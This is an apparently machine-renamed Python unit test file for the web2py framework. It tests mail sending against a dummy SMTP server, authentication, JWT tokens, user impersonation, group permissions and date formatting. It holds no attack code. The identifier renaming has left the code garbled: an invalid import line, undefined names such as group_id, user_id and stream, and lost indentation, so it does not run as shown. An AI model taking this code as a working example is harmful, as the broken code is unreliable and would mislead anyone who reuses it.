from gluon.globals import Request, Response, Session
from gluon.storage import Storage
from gluon.languages import .TranslatorFactory
from gluon.http import HTTP
from gluon import SPAN, H3, TABLE, TR, TD, A, URL, current
VAR_1 = "imap" in VAR_0
class VAR_23(unittest.TestCase):
class CLASS_6(object):
def __init__(self, VAR_10, VAR_11, VAR_12):
self.sender = VAR_10
self.to = VAR_11
self.payload = VAR_12
self._parsed_payload = None
@property
def FUNC_63(self):
if self._parsed_payload is None:
import email
self._parsed_payload = email.message_from_string(self.payload)
return self._parsed_payload
class CLASS_7(object):
VAR_13 = []
VAR_14 = {}
def __init__(self, VAR_15, VAR_16, **VAR_4):
self.address = VAR_15
self.port = VAR_16
self.has_quit = False
self.tls = False
def FUNC_64(self, VAR_17, VAR_18):
if VAR_17 not in self.users or self.users[VAR_17] != VAR_18:
raise smtplib.SMTPAuthenticationError
self.username = VAR_17
self.password = VAR_18
def FUNC_65(self, VAR_10, VAR_11, VAR_12):
self.inbox.append(VAR_23.Message(VAR_10, VAR_11, VAR_12))
def FUNC_66(self):
self.has_quit = True
def FUNC_67(self, VAR_19=None):
pass
def FUNC_68(self):
self.tls = True
def FUNC_1(self):
self.original_SMTP = smtplib.SMTP
self.original_SMTP_SSL = smtplib.SMTP_SSL
smtplib.SMTP = VAR_23.DummySMTP
smtplib.SMTP_SSL = VAR_23.DummySMTP
def FUNC_2(self):
smtplib.SMTP = self.original_SMTP
smtplib.SMTP_SSL = self.original_SMTP_SSL
def FUNC_3(self):
VAR_20 = Mail()
VAR_20.settings.server = 'smtp.example.com:25'
VAR_20.settings.sender = 'you@example.com'
self.assertTrue(VAR_20.send(VAR_11=['somebody@example.com'],
subject='hello',
reply_to='us@example.com',
VAR_21='world'))
VAR_21 = VAR_23.DummySMTP.inbox.pop()
self.assertEqual(VAR_21.sender, VAR_20.settings.sender)
self.assertEqual(VAR_21.to, ['somebody@example.com'])
VAR_22 = "To: somebody@example.com\nReply-To: us@example.com\nSubject: hello\n"
self.assertTrue(VAR_22 in VAR_21.payload)
self.assertTrue(VAR_21.payload.endswith('world'))
def FUNC_4(self):
VAR_20 = Mail()
VAR_20.settings.server = 'smtp.example.com:25'
VAR_20.settings.sender = 'you@example.com'
VAR_20.settings.login = 'username:password'
self.assertFalse(VAR_20.send(VAR_11=['somebody@example.com'],
subject='hello',
reply_to='us@example.com',
VAR_21='world'))
def FUNC_5(self):
VAR_23.DummySMTP.users['username'] = 'password'
VAR_20 = Mail()
VAR_20.settings.server = 'smtp.example.com:25'
VAR_20.settings.sender = 'you@example.com'
VAR_20.settings.login = 'username:password'
self.assertTrue(VAR_20.send(VAR_11=['somebody@example.com'],
subject='hello',
reply_to='us@example.com',
VAR_21='world'))
del VAR_23.DummySMTP.users['username']
VAR_23.DummySMTP.inbox.pop()
def FUNC_6(self):
VAR_20 = Mail()
VAR_20.settings.server = 'smtp.example.com:25'
VAR_20.settings.sender = 'you@example.com'
self.assertTrue(VAR_20.send(VAR_11=['somebody@example.com'],
subject='hello',
reply_to='us@example.com',
VAR_21='<html><head></head><body></body></html>'))
VAR_21 = VAR_23.DummySMTP.inbox.pop()
self.assertTrue('Content-Type: text/html' in VAR_21.payload)
def FUNC_7(self):
VAR_20 = Mail()
VAR_20.settings.server = 'smtp.example.com:25'
VAR_20.settings.sender = 'you@example.com'
self.assertTrue(VAR_20.send(VAR_11=['somebody@example.com'],
VAR_21=('Text only', '<html><pre>HTML Only</pre></html>')))
VAR_21 = VAR_23.DummySMTP.inbox.pop()
self.assertTrue(VAR_21.parsed_payload.is_multipart())
self.assertTrue(VAR_21.parsed_payload.get_content_type() == 'multipart/alternative')
VAR_24 = VAR_21.parsed_payload.get_payload()
self.assertTrue('Text only' in VAR_24[0].as_string())
self.assertTrue('<html><pre>HTML Only</pre></html>' in VAR_24[1].as_string())
def FUNC_8(self):
VAR_20 = Mail()
VAR_20.settings.server = 'smtp.example.com:25'
VAR_20.settings.sender = 'you@example.com'
VAR_20.settings.ssl = True
self.assertTrue(VAR_20.send(VAR_11=['somebody@example.com'],
subject='hello',
reply_to='us@example.com',
VAR_21='world'))
VAR_23.DummySMTP.inbox.pop()
def FUNC_9(self):
VAR_20 = Mail()
VAR_20.settings.server = 'smtp.example.com:25'
VAR_20.settings.sender = 'you@example.com'
VAR_20.settings.tls = True
self.assertTrue(VAR_20.send(VAR_11=['somebody@example.com'],
subject='hello',
reply_to='us@example.com',
VAR_21='world'))
VAR_23.DummySMTP.inbox.pop()
def FUNC_10(self):
VAR_25 = os.path.abspath(__file__)
VAR_20 = Mail()
VAR_20.settings.server = 'smtp.example.com:25'
VAR_20.settings.sender = 'you@example.com'
self.assertTrue(VAR_20.send(VAR_11=['somebody@example.com'],
subject='hello',
VAR_21='world',
attachments=Mail.Attachment(VAR_25)))
VAR_21 = VAR_23.DummySMTP.inbox.pop()
VAR_26 = VAR_21.parsed_payload.get_payload(1).get_payload(decode=True)
with open(VAR_25, 'rb') as mf:
self.assertEqual(to_bytes(VAR_26), to_bytes(mf.read()))
VAR_27 = open(VAR_25)
self.assertRaises(Exception, lambda *VAR_3, **VAR_4: Mail.Attachment(*VAR_3, **VAR_4), VAR_27)
stream.close()
self.assertTrue(VAR_20.send(VAR_11=['somebody@example.com'],
subject='hello',
VAR_21='world',
attachments=Mail.Attachment(VAR_25, content_id='trololo', content_type='tra/lala')))
VAR_21 = VAR_23.DummySMTP.inbox.pop()
self.assertTrue('Content-Type: tra/lala' in VAR_21.payload)
self.assertTrue('Content-Id: <trololo>' in VAR_21.payload)
class CLASS_1(unittest.TestCase):
def FUNC_1(self):
from gluon.tools import AuthJWT
from gluon import current
self.request = Request(env={})
self.request.application = 'a'
self.request.controller = 'c'
self.request.function = 'f'
self.request.folder = 'applications/admin'
self.current = current
self.current.request = self.request
self.db = DAL(VAR_0, check_reserved=['all'])
self.auth = Auth(self.db)
self.auth.define_tables(VAR_17=True, signature=False)
self.user_data = dict(VAR_17='jwtuser', VAR_18='jwtuser123')
self.db.auth_user.insert(VAR_17=self.user_data['username'],
VAR_18=str(
self.db.auth_user.password.requires[0](
self.user_data['password'])[0]))
self.jwtauth = AuthJWT(self.auth, secret_key='secret', verify_expiration=True)
def FUNC_11(self):
import gluon.serializers
self.request.vars.update(self.user_data)
self.token = self.jwtauth.jwt_token_manager()
self.assertIsNotNone(self.token)
del self.request.vars['username']
del self.request.vars['password']
self.request.vars._token = gluon.serializers.json_parser.loads(self.token)['token']
self.token = self.jwtauth.jwt_token_manager()
self.assertIsNotNone(self.token)
def FUNC_12(self):
import gluon.serializers
self.request.vars.update(self.user_data)
self.token = self.jwtauth.jwt_token_manager()
self.assertIsNotNone(self.token)
del self.request.vars['username']
del self.request.vars['password']
self.token = self.jwtauth.jwt_token_manager()
self.request.vars._token = gluon.serializers.json_parser.loads(self.token)['token']
@self.jwtauth.allows_jwt()
def FUNC_69():
self.assertEqual(self.user_data['username'], self.auth.user.username)
FUNC_69()
@unittest.skipIf(VAR_1, "TODO: Imap raises 'Connection refused'")
class CLASS_2(unittest.TestCase):
def FUNC_13(self, *VAR_3, **VAR_4):
if PY2:
return getattr(self, 'assertRaisesRegexp')(*VAR_3, **VAR_4)
return getattr(self, 'assertRaisesRegex')(*VAR_3, **VAR_4)
def FUNC_1(self):
self.request = Request(env={})
self.request.application = 'a'
self.request.controller = 'c'
self.request.function = 'f'
self.request.folder = 'applications/admin'
self.response = Response()
self.session = Session()
VAR_28 = TranslatorFactory('', 'en')
self.session.connect(self.request, self.response)
from gluon.globals import current
self.current = current
self.current.request = self.request
self.current.response = self.response
self.current.session = self.session
self.current.T = VAR_28
self.db = DAL(VAR_0, check_reserved=['all'])
self.auth = Auth(self.db)
self.auth.define_tables(VAR_17=True, signature=False)
self.db.define_table('t0', Field('tt'), self.auth.signature)
self.auth.enable_record_versioning(self.db)
self.auth.settings.registration_requires_verification = False
self.auth.settings.registration_requires_approval = False
self.auth.register_bare(first_name='Bart',
last_name='Simpson',
VAR_17='bart',
email='bart@simpson.com',
VAR_18='bart_password')
def FUNC_14(self):
self.assertTrue('auth_user' in self.db)
self.assertTrue('auth_group' in self.db)
self.assertTrue('auth_membership' in self.db)
self.assertTrue('auth_permission' in self.db)
self.assertTrue('auth_event' in self.db)
VAR_29 = self.db(self.db.auth_user.username == 'bart').select().first()
self.assertEqual(VAR_29['username'], 'bart')
self.assertEqual(VAR_29['registration_key'], '')
VAR_30 = self.db(self.db.auth_user.username == 'bart').select().first().id
VAR_31 = self.db(self.db.auth_group.role == 'user_{0}'.format(VAR_30)).select().first().id
self.assertTrue(self.db((self.db.auth_membership.group_id == VAR_31) &
(self.db.auth_membership.user_id == VAR_30)).select().first())
def FUNC_15(self):
for f in ['login', 'retrieve_password', 'retrieve_username', 'register']:
VAR_89 = getattr(self.auth, f)().xml()
self.assertTrue(b'name="_formkey"' in VAR_89)
for f in ['logout', 'verify_email', 'reset_password', 'change_password', 'profile', 'groups']:
self.myassertRaisesRegex(HTTP, "303*", getattr(self.auth, f))
self.myassertRaisesRegex(HTTP, "401*", self.auth.impersonate)
try:
for t in ['t0_archive', 't0', 'auth_cas', 'auth_event',
'auth_membership', 'auth_permission', 'auth_group',
'auth_user']:
self.db[t].drop()
except SyntaxError as e:
pass
return
def FUNC_16(self):
self.current.request.vars._next = 'next_test'
self.assertEqual(self.auth.get_vars_next(), 'next_test')
def FUNC_17(self):
self.assertTrue('t0_archive' in self.db)
def FUNC_18(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
VAR_30 = self.db(self.db.auth_user.username == 'bart').select(self.db.auth_user.id).first().id
self.auth.log_event(description='some_log_event_description_%(var1)s',
vars={"var1": "var1"},
origin='log_event_test_1')
VAR_32 = self.db(self.db.auth_event.origin == 'log_event_test_1'
).select(*[self.db.auth_event[f]
for f in self.db.auth_event.fields if f not in ('id', 'time_stamp')]).first().as_dict()
self.assertEqual(set(VAR_32.items()), set({'origin': 'log_event_test_1',
'client_ip': None,
'user_id': VAR_30,
'description': 'some_log_event_description_var1'}.items()))
self.auth.logout_bare()
self.auth.log_event(description='some_log_event_description_%(var2)s',
vars={"var2": "var2"},
origin='log_event_test_2')
VAR_32 = self.db(self.db.auth_event.origin == 'log_event_test_2'
).select(*[self.db.auth_event[f]
for f in self.db.auth_event.fields if f not in ('id', 'time_stamp')]).first().as_dict()
self.assertEqual(set(VAR_32.items()), set({'origin': 'log_event_test_2',
'client_ip': None,
'user_id': None,
'description': 'some_log_event_description_var2'}.items()))
self.auth.settings.logging_enabled = False
VAR_33 = self.db(self.db.auth_event.id > 0).count()
self.auth.log_event(description='some_log_event_description_%(var3)s',
vars={"var3": "var3"},
origin='log_event_test_3')
VAR_34 = self.db(self.db.auth_event.id > 0).count()
self.assertEqual(VAR_34, VAR_33)
self.auth.settings.logging_enabled = True
VAR_33 = self.db(self.db.auth_event.id > 0).count()
self.auth.log_event(description=None,
vars={"var4": "var4"},
origin='log_event_test_4')
VAR_34 = self.db(self.db.auth_event.id > 0).count()
self.assertEqual(VAR_34, VAR_33)
def FUNC_19(self):
self.db.auth_user.insert(email='user1@test.com', VAR_17='user1', VAR_18='password_123')
self.db.commit()
self.assertEqual(self.auth.get_or_create_user({'email': 'user1@test.com',
'username': 'user1',
'password': 'password_123'
})['username'], 'user1')
self.assertEqual(self.auth.get_or_create_user({'email': 'user2@test.com',
'username': 'user2'})['username'], 'user2')
self.assertEqual(self.auth.get_or_create_user({'first_name': 'Omer',
'last_name': 'Simpson',
'email': 'user3@test.com',
'registration_id': 'user3',
'username': 'user3'})['username'], 'user3')
self.assertEqual(self.auth.get_or_create_user({'email': ''}), None)
self.db.auth_user.truncate()
self.db.commit()
def FUNC_20(self):
self.auth.login_bare(VAR_17='bart', VAR_18='bart_password')
self.assertTrue(self.auth.is_logged_in())
self.auth.logout_bare()
self.assertFalse(self.auth.login_bare(VAR_17='bart', VAR_18='wrong_password'))
def FUNC_21(self):
self.assertRaises(ValueError, self.auth.register_bare)
self.assertEqual(self.auth.register_bare(VAR_17='bart', VAR_18='wrong_password'), False)
self.assertEqual(self.auth.register_bare(VAR_17='user2',
email='user2@test.com',
VAR_18='password_123')['username'], 'user2')
self.assertRaises(ValueError, self.auth.register_bare,
**dict(wrong_field_name='user3', VAR_18='password_123'))
self.assertRaises(ValueError, self.auth.register_bare,
**dict(email='user4@', VAR_18='password_123'))
self.db.auth_user.truncate()
self.db.commit()
def FUNC_22(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
self.assertTrue(self.auth.is_logged_in())
self.auth.logout_bare()
self.assertFalse(self.auth.is_logged_in())
def FUNC_23(self):
self.auth.user = 'logged_in'
self.assertTrue(self.auth.is_logged_in())
self.auth.user = None
self.assertFalse(self.auth.is_logged_in())
def FUNC_24(self):
self.assertTrue(self.auth.random_password())
def FUNC_25(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
self.auth.settings.bulk_register_enabled = True
VAR_35 = self.auth.bulk_register(max_emails=10).xml()
self.assertTrue(b'name="_formkey"' in VAR_35)
def FUNC_26(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
VAR_36 = getattr(self.auth, 'change_password')().xml()
self.assertTrue(b'name="_formkey"' in VAR_36)
def FUNC_27(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
VAR_37 = getattr(self.auth, 'profile')().xml()
self.assertTrue(b'name="_formkey"' in VAR_37)
def FUNC_28(self):
self.auth.get_or_create_user(dict(first_name='Omer',
last_name='Simpson',
VAR_17='omer',
email='omer@test.com',
VAR_18='password_omer',
registration_key='',
registration_id=''),
FUNC_64=False)
self.db.commit()
self.assertFalse(self.auth.is_logged_in())
VAR_38 = self.auth.add_group('impersonate')
self.auth.add_membership(VAR_43=self.db(self.db.auth_user.username == 'bart'
).select(self.db.auth_user.id).first().id,
VAR_38=group_id)
self.auth.add_permission(VAR_38=group_id,
name='impersonate',
table_name='auth_user',
record_id=0)
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
self.assertTrue(self.auth.is_logged_in())
VAR_30 = self.db(self.db.auth_user.username == 'bart').select(self.db.auth_user.id).first().id
self.assertEqual(self.auth.user_id, VAR_30)
self.assertEqual(self.auth.impersonate().xml(),
b'<form action="#" enctype="multipart/form-data" method="post"><table><tr id="no_table_user_id__row"><td class="w2p_fl"><label class="" for="no_table_user_id" id="no_table_user_id__label">User Id: </label></td><td class="w2p_fw"><input class="integer" id="no_table_user_id" name="user_id" type="text" value="" /></td><td class="w2p_fc"></td></tr><tr id="submit_record__row"><td class="w2p_fl"></td><td class="w2p_fw"><input type="submit" value="Submit" /></td><td class="w2p_fc"></td></tr></table></form>')
self.assertEqual(self.auth.impersonate(VAR_30), None)
self.assertFalse(self.auth.is_impersonating()) # User shouldn't impersonate itself?
VAR_39 = self.db(self.db.auth_user.username == 'omer').select(self.db.auth_user.id).first().id
VAR_40 = self.auth.impersonate(VAR_43=VAR_39)
self.assertTrue(self.auth.is_impersonating())
self.assertEqual(self.auth.user_id, VAR_39) # we make it really sure
self.assertEqual(VAR_40.xml(),
b'<form action="#" enctype="multipart/form-data" method="post"><table><tr id="auth_user_id__row"><td class="w2p_fl"><label class="readonly" for="auth_user_id" id="auth_user_id__label">Id: </label></td><td class="w2p_fw"><span id="auth_user_id">2</span></td><td class="w2p_fc"></td></tr><tr id="auth_user_first_name__row"><td class="w2p_fl"><label class="readonly" for="auth_user_first_name" id="auth_user_first_name__label">First name: </label></td><td class="w2p_fw">Omer</td><td class="w2p_fc"></td></tr><tr id="auth_user_last_name__row"><td class="w2p_fl"><label class="readonly" for="auth_user_last_name" id="auth_user_last_name__label">Last name: </label></td><td class="w2p_fw">Simpson</td><td class="w2p_fc"></td></tr><tr id="auth_user_email__row"><td class="w2p_fl"><label class="readonly" for="auth_user_email" id="auth_user_email__label">E-VAR_20: </label></td><td class="w2p_fw">omer@test.com</td><td class="w2p_fc"></td></tr><tr id="auth_user_username__row"><td class="w2p_fl"><label class="readonly" for="auth_user_username" id="auth_user_username__label">Username: </label></td><td class="w2p_fw">omer</td><td class="w2p_fc"></td></tr></table><div style="display:none;"><input name="id" type="hidden" value="2" /></div></form>')
self.auth.logout_bare()
self.auth.login_user(self.db(self.db.auth_user.username == 'omer').select().first()) # bypass login_bare()
self.myassertRaisesRegex(HTTP, "403*", self.auth.impersonate, VAR_30)
self.auth.logout_bare()
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
self.myassertRaisesRegex(HTTP, "401*", self.auth.impersonate, 1000) # VAR_42 with id 1000 shouldn't exist
self.auth.impersonate(VAR_43=VAR_39)
self.assertTrue(self.auth.is_impersonating())
self.assertEqual(self.auth.impersonate(VAR_43=0), None)
def FUNC_29(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
self.assertEqual(self.auth.groups().xml(),
b'<table><tr><td><h3>user_1(1)</h3></td></tr><tr><td><p></p></td></tr></table>')
def FUNC_30(self):
self.current.request.ajax = 'facke_ajax_request'
self.myassertRaisesRegex(HTTP, "403*", self.auth.not_authorized)
self.current.request.ajax = None
self.assertEqual(self.auth.not_authorized(), self.auth.messages.access_denied)
def FUNC_12(self):
self.myassertRaisesRegex(HTTP, "400*", self.auth.allows_jwt)
def FUNC_31(self):
self.assertEqual(self.auth.add_group(role='a_group', description='a_group_role_description'),
self.db(self.db.auth_group.role == 'a_group').select(self.db.auth_group.id).first().id)
def FUNC_32(self):
VAR_31 = 1 # Should be group 1, 'user_1'
self.assertEqual(self.auth.del_group(VAR_38=VAR_31), None)
def FUNC_33(self):
self.assertEqual(self.auth.id_group(role='user_1'), 1)
self.assertEqual(self.auth.id_group(role='non_existing_role_name'), None)
def FUNC_34(self):
self.assertEqual(self.auth.user_group(VAR_43=1), 1)
def FUNC_35(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
VAR_41 = 'user_%s' % self.db(self.db.auth_user.username == 'bart'
).select(self.db.auth_user.id).first().id
self.assertEqual(self.auth.user_group_role(), VAR_41)
self.auth.logout_bare()
self.assertEqual(self.auth.user_group_role(VAR_43=1), 'user_1')
self.auth.settings.create_user_groups = None
self.assertEqual(self.auth.user_group_role(VAR_43=1), None)
def FUNC_36(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
self.assertTrue(self.auth.has_membership('user_1'))
self.assertFalse(self.auth.has_membership('user_555'))
self.assertTrue(self.auth.has_membership(VAR_38=1))
self.auth.logout_bare()
self.assertTrue(self.auth.has_membership(role='user_1', VAR_43=1))
self.assertTrue(self.auth.has_membership(VAR_38=1, VAR_43=1))
VAR_33 = self.db(self.db.auth_event.id > 0).count()
self.assertTrue(self.auth.has_membership(VAR_38=1, VAR_43=1))
VAR_34 = self.db(self.db.auth_event.id > 0).count()
self.assertEqual(VAR_34, VAR_33)
def FUNC_37(self):
VAR_42 = self.db(self.db.auth_user.username == 'bart').select().first() # bypass login_bare()
VAR_43 = VAR_42.id
VAR_44 = 'test_add_membership_group'
VAR_38 = self.auth.add_group(VAR_44)
self.assertFalse(self.auth.has_membership(VAR_44))
self.auth.add_membership(VAR_38=group_id, VAR_43=user_id)
self.assertTrue(self.auth.has_membership(VAR_38, VAR_43=user_id))
self.auth.del_membership(VAR_38=group_id, VAR_43=user_id)
self.assertFalse(self.auth.has_membership(VAR_38, VAR_43=user_id))
self.auth.add_membership(role=VAR_44, VAR_43=user_id)
self.assertTrue(self.auth.has_membership(VAR_38, VAR_43=user_id))
self.auth.del_membership(VAR_38=group_id, VAR_43=user_id)
self.assertFalse(self.auth.has_membership(VAR_38, VAR_43=user_id))
with self.myassertRaisesRegex(ValueError, '^VAR_38 not provided or invalid$'):
self.auth.add_membership(VAR_38='not_existing_group_name', VAR_43=user_id)
with self.myassertRaisesRegex(ValueError, '^VAR_38 not provided or invalid$'):
self.auth.add_membership(role='not_existing_role_name', VAR_43=user_id)
with self.myassertRaisesRegex(ValueError, '^VAR_43 not provided or invalid$'):
self.auth.add_membership(VAR_38=group_id, VAR_43=None)
with self.myassertRaisesRegex(ValueError, '^VAR_43 not provided or invalid$'):
self.auth.add_membership(role=VAR_44, VAR_43=None)
self.auth.login_user(VAR_42)
self.auth.add_membership(VAR_38=group_id)
self.assertTrue(self.auth.has_membership(VAR_38))
self.auth.del_membership(VAR_38=group_id)
self.assertFalse(self.auth.has_membership(VAR_38))
self.auth.add_membership(role=VAR_44)
self.assertTrue(self.auth.has_membership(VAR_38))
self.auth.del_membership(VAR_38=group_id)
self.assertFalse(self.auth.has_membership(VAR_38))
self.auth.add_membership(VAR_44)
self.assertTrue(self.auth.has_membership(VAR_38))
self.auth.del_membership(VAR_38=group_id)
self.assertFalse(self.auth.has_membership(VAR_38))
VAR_45 = self.auth.add_membership(VAR_38)
self.assertTrue(self.auth.has_membership(VAR_38))
VAR_46 = self.auth.add_membership(VAR_38)
self.assertEqual(VAR_45, VAR_46)
self.auth.del_membership(VAR_38=group_id)
self.assertFalse(self.auth.has_membership(VAR_38))
with self.myassertRaisesRegex(ValueError, '^VAR_38 not provided or invalid$'):
self.auth.add_membership(VAR_38='not_existing_group_name')
with self.myassertRaisesRegex(ValueError, '^VAR_38 not provided or invalid$'):
self.auth.add_membership(role='not_existing_role_name')
def FUNC_38(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
VAR_33 = self.db(self.db.auth_event.id > 0).count()
VAR_47 = self.db(self.db.auth_membership.group_id == self.auth.id_group('user_1')
).select(self.db.auth_membership.id).first().id
self.assertEqual(self.auth.del_membership('user_1'), VAR_47)
VAR_34 = self.db(self.db.auth_event.id > 0).count()
self.assertEqual(VAR_34, VAR_33)
VAR_38 = self.auth.add_group('some_test_group')
VAR_48 = self.auth.add_membership('some_test_group')
self.assertEqual(self.auth.user_groups[VAR_38], 'some_test_group')
self.auth.logout_bare()
self.assertFalse(self.auth.del_membership('some_test_group'))
self.assertEqual(set(self.db.auth_membership(VAR_48).as_dict().items()),
set({'group_id': 2, 'user_id': 1, 'id': 2}.items())) # is not deleted
VAR_30 = self.db(self.db.auth_user.username == 'bart').select(self.db.auth_user.id).first().id
self.assertTrue(self.auth.del_membership('some_test_group', VAR_43=VAR_30))
self.assertEqual(self.db.auth_membership(VAR_48), None) # is really deleted
def FUNC_39(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
VAR_30 = self.db(self.db.auth_user.username == 'bart').select(self.db.auth_user.id).first().id
self.auth.add_permission(VAR_38=self.auth.id_group('user_1'),
name='some_permission',
table_name='auth_user',
record_id=0,
)
self.assertTrue(self.auth.has_permission(name='some_permission',
table_name='auth_user',
record_id=0,
VAR_43=VAR_30,
VAR_38=self.auth.id_group('user_1')))
self.assertFalse(self.auth.has_permission(name='some_other_permission',
table_name='auth_user',
record_id=0,
VAR_43=VAR_30,
VAR_38=self.auth.id_group('user_1')))
def FUNC_40(self):
VAR_33 = self.db(self.db.auth_event.id > 0).count()
VAR_49 = \
self.auth.add_permission(VAR_38=self.auth.id_group('user_1'),
name='some_permission',
table_name='auth_user',
record_id=0,
)
VAR_34 = self.db(self.db.auth_event.id > 0).count()
self.assertEqual(VAR_34, VAR_33)
VAR_50 = \
self.db(self.db.auth_permission.id == VAR_49).count()
self.assertTrue(VAR_50)
VAR_50 = \
self.db((self.db.auth_permission.group_id == self.auth.id_group('user_1')) &
(self.db.auth_permission.name == 'no_permission') &
(self.db.auth_permission.table_name == 'no_table') &
(self.db.auth_permission.record_id == 0)).count()
self.assertFalse(VAR_50)
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
VAR_49 = \
self.auth.add_permission(VAR_38=0,
name='user_1_permission',
table_name='auth_user',
record_id=0,
)
VAR_51 = \
self.db(self.db.auth_permission.id == VAR_49).select(self.db.auth_permission.name).first().name
self.assertEqual(VAR_51, 'user_1_permission')
VAR_49 =\
self.auth.add_permission(VAR_38=0,
name='user_1_permission',
table_name='auth_user',
record_id=0,
)
self.assertTrue(VAR_49)
def FUNC_41(self):
VAR_49 = \
self.auth.add_permission(VAR_38=self.auth.id_group('user_1'),
name='del_permission_test',
table_name='auth_user',
record_id=0,
)
VAR_33 = self.db(self.db.auth_event.id > 0).count()
self.assertTrue(self.auth.del_permission(VAR_38=self.auth.id_group('user_1'),
name='del_permission_test',
table_name='auth_user',
record_id=0,))
VAR_34 = self.db(self.db.auth_event.id > 0).count()
self.assertEqual(VAR_34, VAR_33)
VAR_50 = \
self.db(self.db.auth_permission.id == VAR_49).count()
self.assertFalse(VAR_50)
class CLASS_3(unittest.TestCase):
def FUNC_42(self):
VAR_52 = datetime.datetime.now()
self.assertEqual(prettydate(VAR_78=VAR_52), 'now')
VAR_53 = VAR_52 - datetime.timedelta(seconds=1)
self.assertEqual(prettydate(VAR_78=VAR_53), '1 second ago')
VAR_54 = VAR_52 - datetime.timedelta(seconds=2)
self.assertEqual(prettydate(VAR_78=VAR_54), '2 seconds ago')
VAR_55 = VAR_52 - datetime.timedelta(seconds=60)
self.assertEqual(prettydate(VAR_78=VAR_55), '1 minute ago')
VAR_56 = VAR_52 - datetime.timedelta(seconds=61)
self.assertEqual(prettydate(VAR_78=VAR_56), '1 minute ago')
VAR_57 = VAR_52 - datetime.timedelta(seconds=120)
self.assertEqual(prettydate(VAR_78=VAR_57), '2 minutes ago')
VAR_58 = VAR_52 - datetime.timedelta(seconds=121)
self.assertEqual(prettydate(VAR_78=VAR_58), '2 minutes ago')
VAR_59 = VAR_52 - datetime.timedelta(seconds=60 * 60)
self.assertEqual(prettydate(VAR_78=VAR_59), '1 hour ago')
VAR_60 = VAR_52 - datetime.timedelta(seconds=3601)
self.assertEqual(prettydate(VAR_78=VAR_60), '1 hour ago')
VAR_61 = VAR_52 - datetime.timedelta(seconds=2 * 60 * 60)
self.assertEqual(prettydate(VAR_78=VAR_61), '2 hours ago')
VAR_62 = VAR_52 - datetime.timedelta(seconds=2 * 60 * 60 + 1)
self.assertEqual(prettydate(VAR_78=VAR_62), '2 hours ago')
VAR_63 = VAR_52 - datetime.timedelta(days=1)
self.assertEqual(prettydate(VAR_78=VAR_63), '1 day ago')
VAR_64 = VAR_52 - datetime.timedelta(days=2)
self.assertEqual(prettydate(VAR_78=VAR_64), '2 days ago')
VAR_65 = VAR_52 - datetime.timedelta(days=7)
self.assertEqual(prettydate(VAR_78=VAR_65), '1 week ago')
VAR_66 = VAR_52 - datetime.timedelta(days=8)
self.assertEqual(prettydate(VAR_78=VAR_66), '1 week ago')
VAR_67 = VAR_52 - datetime.timedelta(days=14)
self.assertEqual(prettydate(VAR_78=VAR_67), '2 weeks ago')
VAR_68 = VAR_52 - datetime.timedelta(days=15)
self.assertEqual(prettydate(VAR_78=VAR_68), '2 weeks ago')
VAR_69 = VAR_52 - datetime.timedelta(days=21)
self.assertEqual(prettydate(VAR_78=VAR_69), '3 weeks ago')
VAR_70 = VAR_52 - datetime.timedelta(days=27)
self.assertEqual(prettydate(VAR_78=VAR_70), '1 month ago')
VAR_71 = VAR_52 - datetime.timedelta(days=28)
self.assertEqual(prettydate(VAR_78=VAR_71), '1 month ago')
VAR_72 = VAR_52 - datetime.timedelta(days=60)
self.assertEqual(prettydate(VAR_78=VAR_72), '2 months ago')
VAR_73 = VAR_52 - datetime.timedelta(days=90)
self.assertEqual(prettydate(VAR_78=VAR_73), '3 months ago')
VAR_74 = VAR_52 - datetime.timedelta(days=365)
self.assertEqual(prettydate(VAR_78=VAR_74), '1 year ago')
VAR_75 = VAR_52 - datetime.timedelta(days=366)
self.assertEqual(prettydate(VAR_78=VAR_75), '1 year ago')
VAR_76 = VAR_52 - datetime.timedelta(days=2 * 365)
self.assertEqual(prettydate(VAR_78=VAR_76), '2 years ago')
VAR_77 = VAR_52 - datetime.timedelta(days=2 * 365 + 1)
self.assertEqual(prettydate(VAR_78=VAR_77), '2 years ago')
VAR_78 = VAR_52.date()
self.assertEqual(prettydate(VAR_78=d), 'now')
VAR_63 = VAR_52.date() - datetime.timedelta(days=1)
self.assertEqual(prettydate(VAR_78=VAR_63), '1 day ago')
VAR_79 = VAR_52.date() - datetime.timedelta(days=2)
self.assertEqual(prettydate(VAR_78=VAR_79), '2 days ago')
VAR_80 = VAR_52 - datetime.timedelta(seconds=-65)
self.assertEqual(prettydate(VAR_78=VAR_80), '1 minute from now')
VAR_81 = VAR_52 - datetime.timedelta(hours=-23.5)
self.assertEqual(prettydate(VAR_78=VAR_81), '23 hours from now')
VAR_82 = VAR_52 - datetime.timedelta(days=-366)
self.assertEqual(prettydate(VAR_78=VAR_82), '1 year from now')
VAR_52 = datetime.datetime.utcnow()
self.assertEqual(prettydate(VAR_78=VAR_52, utc=True), 'now')
VAR_53 = VAR_52 - datetime.timedelta(seconds=1)
self.assertEqual(prettydate(VAR_78=VAR_53, utc=True), '1 second ago')
self.assertEqual(prettydate(VAR_78=None), '')
self.assertEqual(prettydate(VAR_78='invalid_date'), '[invalid date]')
VAR_2 = os.path.join
def FUNC_0():
return os.name == 'posix'
class CLASS_4(unittest.TestCase):
def FUNC_43(self):
VAR_83 = [
('/foo/bar', '/foo'),
('/foo', '/foo'),
('/foo', '/'),
('/', '/'),
]
for sub, VAR_5 in VAR_83:
self.assertTrue(Expose._Expose__in_base(subdir=sub, basedir=VAR_5, sep='/'),
'%s is not under %s' % (sub, VAR_5))
def FUNC_44(self):
VAR_84 = [
('/foobar', '/foo'),
('/foo', '/foo/bar'),
